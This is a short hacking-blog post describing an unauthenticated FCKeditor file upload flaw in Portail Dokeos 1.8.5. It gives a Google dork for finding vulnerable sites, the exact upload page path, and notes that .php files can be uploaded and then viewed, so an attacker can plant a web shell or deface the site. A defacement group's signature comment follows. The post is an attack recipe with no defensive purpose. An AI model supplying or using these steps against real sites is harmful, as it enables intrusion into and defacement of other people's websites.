![=-=>>W3LC[]M3<<=-=](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKDfXWbxTiIVc3Mpzd5cHDrZosfQsD6U4AO1p-OXMSPw53WXIObbXzVhbwSucaYVwciOWxScMYx7TGvAd5xE9RnH-5Y4m-JMHs7p9K_B3iu7Sju0N8jjbeLkC47MybRRe1R9rA5tl1PFc/s1600/2.jpg)
Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password.
Google Dork
"Portail Dokeos 1.8.5"
Exploit http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Just add "/main/inc/lib/fckeditor/editor/filemanager/upload/test.html" after www.website.com.
You can upload, .html .php .jpg .txt formats here. To view your uploaded file go here : http://website/patch/main/upload/your file here
we love iran ~~~~~~~~ www.max-team.ir~~~~~~~ miladviper
ReplyDelete